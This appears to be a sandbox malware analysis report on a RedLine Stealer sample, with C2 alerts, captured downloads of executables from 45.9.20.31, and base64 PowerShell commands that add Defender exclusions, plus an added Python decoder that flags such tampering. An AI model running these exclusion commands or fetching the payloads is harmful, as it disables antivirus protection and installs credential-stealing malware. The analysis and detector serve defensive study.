IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x170 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x11f3d0 | 0x11f400 | False | 0.82463861238 | data | 7.61191579951 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x121000 | 0x394c | 0x1a00 | False | 0.316856971154 | data | 3.78649660619 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc | 0x125000 | 0x2d10 | 0x2e00 | False | 0.447860054348 | data | 4.47251298963 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x128000 | 0x5c37c | 0x5c400 | False | 0.107588605183 | data | 2.9506947336 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x128388 | 0x42028 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 0, next used block 0 | German | Austria
RT_ICON | 0x16a3b0 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | German | Austria
RT_ICON | 0x17abd8 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 65535, next used block 4294901760 | German | Austria
RT_ICON | 0x17ee00 | 0x25a8 | data | German | Austria
RT_ICON | 0x1813a8 | 0x10a8 | data | German | Austria
RT_ICON | 0x182450 | 0x988 | data | German | Austria
RT_ICON | 0x182dd8 | 0x468 | GLS_BINARY_LSB_FIRST | German | Austria
RT_MENU | 0x183240 | 0x3e | data | German | Austria
RT_MENU | 0x183280 | 0xd0 | data | German | Austria
RT_MENU | 0x183350 | 0x4e | data | German | Austria
RT_STRING | 0x1833a0 | 0x16c | data | German | Austria
RT_STRING | 0x18350c | 0x5e0 | data | German | Austria
RT_STRING | 0x183aec | 0x4cc | data | German | Austria
RT_STRING | 0x183fb8 | 0x70 | data | German | Austria
RT_GROUP_ICON | 0x184028 | 0x68 | data | German | Austria
RT_VERSION | 0x184090 | 0x2ec | data | German | Austria
DLL | Import
KERNEL32.dll | GenerateConsoleCtrlEvent, GlobalAlloc, LoadLibraryW, FreeConsole, GetAtomNameW, GetACP, MultiByteToWideChar, GetLastError, GetProcAddress, OutputDebugStringW, GetCurrentProcessId, AddConsoleAliasA, GlobalReAlloc, SetEndOfFile, CreateFileW, CreateFileA, WriteConsoleW, AllocConsole, SetConsoleTitleW, GetConsoleAliasExesA, InterlockedIncrement, InterlockedDecrement, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapFree, WideCharToMultiByte, LCMapStringW, GetCPInfo, HeapAlloc, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, SetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, WriteFile, GetConsoleCP, GetConsoleMode, SetHandleCount, GetStdHandle, CloseHandle, GetModuleHandleW, ExitProcess, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, HeapCreate, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetLocaleInfoW, HeapSize, FlushFileBuffers, ReadFile, SetFilePointer, GetOEMCP, IsValidCodePage, GetStringTypeW, HeapReAlloc, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetProcessHeap
USER32.dll | OffsetRect, MessageBoxA, IsRectEmpty, InvertRect
GDI32.dll | ResizePalette, SaveDC
Description | Data
LegalCopyright | Copyright (C) 2020-2022 by Tetec Inc.
InternalName | Snhgowdekrift
FileVersion | 5.10.8.100
CompanyName | Tetec Inc
ProductName | Dikem
ProductVersion | 30.77.57.46
FileDescription | Yequokos yagi
OriginalFilename | Btderogatnive.exe
Translation | 0x0c07 0x0c07
Language of compilation system | Country where language is spoken | Map
German | Austria |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/05/22-03:30:52.519175 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:54.158486 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:54.966150 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:46.265169 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:55.048172 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:51.349484 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:51.712280 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:52.800684 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:52.844061 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:55.007583 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:40.973991 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:32.990118 | TCP | 2850027 | ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:46.475836 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:52.885401 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:51.428831 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:51.508362 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:34.048200 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:54.760590 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:34.088289 | TCP | 2850353 | ETPRO MALWARE Redline Stealer TCP CnC - Id1Response | 32936 | 49796 | 65.21.213.209 | 192.168.2.5
05/05/22-03:30:54.711716 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
05/05/22-03:30:51.576541 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49796 | 32936 | 192.168.2.5 | 65.21.213.209
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 5, 2022 03:31:13.085592031 CEST | 54463 | 53 | 192.168.2.5 | 8.8.8.8
May 5, 2022 03:31:13.104031086 CEST | 53 | 54463 | 8.8.8.8 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 5, 2022 03:31:13.085592031 CEST | 192.168.2.5 | 8.8.8.8 | 0xfd57 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 5, 2022 03:31:13.104031086 CEST | 8.8.8.8 | 192.168.2.5 | 0xfd57 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001)
• 45.9.20.31
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49802 | 45.9.20.31 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | kBytes transferred | Direction | Data
May 5, 2022 03:30:55.478178978 CEST | 12405 | OUT | GET /asdasdasd.exe HTTP/1.1
Host: 45.9.20.31
Connection: Keep-Alive
May 5, 2022 03:30:55.537370920 CEST | 12407 | IN | HTTP/1.1 200 OK
Date: Thu, 05 May 2022 01:30:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 29 Apr 2022 17:53:48 GMT
ETag: "381d98-5ddceb97b6ef9"
Accept-Ranges: bytes
Content-Length: 3677592
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
May 5, 2022 03:30:58.812596083 CEST | 16252 | OUT | GET /rigx.exe HTTP/1.1
Host: 45.9.20.31
May 5, 2022 03:30:58.871620893 CEST | 16254 | IN | HTTP/1.1 200 OK
Date: Thu, 05 May 2022 01:30:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 21 Apr 2022 17:31:37 GMT
ETag: "4a7400-5dd2d7b6f9253"
Accept-Ranges: bytes
Content-Length: 4879360
Content-Type: application/x-msdos-program


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49832 | 208.95.112.1 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Timestamp | kBytes transferred | Direction | Data
May 5, 2022 03:31:13.197494030 CEST | 21575 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
May 5, 2022 03:31:13.234152079 CEST | 21575 | IN | HTTP/1.1 200 OK
Date: Thu, 05 May 2022 01:31:12 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 5
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 74 72 75 65 0a
Data Ascii: true



Target ID: 0
Start time: 03:29:17
Start date: 05/05/2022
Path: C:\Users\user\Desktop\CryptoMiner.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\CryptoMiner.exe"
Imagebase: 0xd70000
File size: 1579064 bytes
MD5 hash: 310EB5BD45AC9C5767D28E63AB64635B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.548433577.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 12
Start time: 03:30:15
Start date: 05/05/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase: 0x840000
File size: 41064 bytes
MD5 hash: EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000000.543024251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000000.542266865.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.648033641.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high

Target ID: 20
Start time: 03:30:57
Start date: 05/05/2022
Path: C:\Users\user\AppData\Local\Temp\fname.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\fname.exe"
Imagebase: 0xcb0000
File size: 3677592 bytes
MD5 hash: C61F9A9059F8B8BD0E69F7DF4CB09786
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 31%, Metadefender
• Detection: 69%, ReversingLabs
Reputation: low

Target ID: 21
Start time: 03:30:58
Start date: 05/05/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff77f440000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 22
Start time: 03:31:00
Start date: 05/05/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase: 0x210000
File size: 98912 bytes
MD5 hash: 6807F903AC06FF7E1670181378690B22
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

                                                                                                                                      Target ID:23
                                                                                                                                      Start time:03:31:00
                                                                                                                                      Start date:05/05/2022
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\filename.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\filename.exe"
                                                                                                                                      Imagebase:0x850000
                                                                                                                                      File size:4879360 bytes
                                                                                                                                      MD5 hash:C108EBDD14A2CF40E64411792987796A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 29%, Metadefender, Browse
                                                                                                                                      • Detection: 81%, ReversingLabs
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:27
                                                                                                                                      Start time:03:31:16
                                                                                                                                      Start date:05/05/2022
                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                                                                                                                                      Imagebase:0x7ff602050000
                                                                                                                                      File size:273920 bytes
                                                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Target ID:28
                                                                                                                                      Start time:03:31:17
                                                                                                                                      Start date:05/05/2022
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff77f440000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Target ID:29
                                                                                                                                      Start time:03:31:18
                                                                                                                                      Start date:05/05/2022
                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                                                                                                                                      Imagebase:0x7ff619710000
                                                                                                                                      File size:447488 bytes
                                                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Reputation:high

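The two -EncodedCommand arguments recorded for cmd.exe (Target ID 27) and powershell.exe (Target ID 29) are Base64 over UTF-16LE text, not UTF-8, which is why a plain base64 decode shows a NUL byte after every character. Decoded, they read Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force and Add-MpPreference -ExclusionExtension @('exe','dll') -Force: the sample tells Microsoft Defender to skip the whole user profile and system drive and every .exe and .dll on the machine. Add-MpPreference needs an elevated token, and the report records these processes as running with administrator privileges, so the exclusions take effect. The decoder and check below are an added example and not part of the Joe Sandbox report; the command line is copied from the Target ID 27 record, while the regexes, the function names and the set of parameters treated as tampering are this example's own choices.

```python
"""Decode PowerShell -EncodedCommand payloads from a process command line and
flag Microsoft Defender exclusion tampering (Add-/Set-MpPreference).

Added example; not part of the Joe Sandbox report.  SAMPLE_CMDLINE is the
command line recorded for Target ID 27; everything else is this example's own
choice (assumed rule names, assumed set of tampering parameters)."""
import base64
import re

# The two Base64 tokens exactly as recorded in the report for Target ID 27.
_TOKEN_PATH = (
    "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4A"
    "UABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4A"
    "dgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
)
_TOKEN_EXT = (
    "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4A"
    "RQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYA"
    "bwByAGMAZQA="
)
SAMPLE_CMDLINE = (
    f'"cmd" cmd /c powershell -EncodedCommand "{_TOKEN_PATH}" & '
    f'powershell -EncodedCommand "{_TOKEN_EXT}" & exit'
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand
# (-e, -ec, -enc, -encodedcommand, ...); -ep (ExecutionPolicy) must not match.
# The token may or may not be quoted; Base64 never contains a quote character.
ENCODED_ARG_RE = re.compile(
    r'-(?:e|ec|en[a-z]*)\s+"?([A-Za-z0-9+/]+=*)"?', re.IGNORECASE
)

# Assumed tampering indicators: an Add-/Set-MpPreference call that adds an
# exclusion or flips a -Disable* switch.  Get-MpPreference is read-only.
MPPREF_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)
TAMPER_PARAM_RE = re.compile(
    r"-(Exclusion(?:Path|Extension|Process|IpAddress)|Disable[A-Za-z]+)\b",
    re.IGNORECASE,
)


def decode_encoded_commands(cmdline: str) -> list[str]:
    """Return every -EncodedCommand payload found in cmdline, decoded to text.

    The payload is Base64 of UTF-16LE, so it is decoded as such rather than
    as UTF-8.  Tokens that are not valid Base64/UTF-16LE are skipped so one
    malformed argument does not abort analysis of the rest of the line."""
    decoded = []
    for token in ENCODED_ARG_RE.findall(cmdline):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-16-le")
        except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
            continue
        decoded.append(text.strip())
    return decoded


def defender_tampering(script: str) -> list[str]:
    """Return the Defender tampering parameters used by a decoded script
    (e.g. ['ExclusionPath']); empty when no Add-/Set-MpPreference is present."""
    if not MPPREF_RE.search(script):
        return []
    return TAMPER_PARAM_RE.findall(script)


def analyze_cmdline(cmdline: str) -> list[dict]:
    """One finding per encoded payload: the decoded text plus any tampering
    parameters it uses.  Suitable for the CommandLine field of a process
    creation event (Sysmon Event ID 1, Security 4688)."""
    return [
        {"decoded": text, "defender_tampering": defender_tampering(text)}
        for text in decode_encoded_commands(cmdline)
    ]


if __name__ == "__main__":
    for finding in analyze_cmdline(SAMPLE_CMDLINE):
        flag = "TAMPER" if finding["defender_tampering"] else "ok"
        print(f"[{flag}] {finding['decoded']}")
```

The extractor only understands the -EncodedCommand family of switches; a payload delivered through -Command with an inline FromBase64String call, or a script file on disk, will not be surfaced by it, so treat this as one check among several rather than a complete PowerShell decoder.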
No disassembly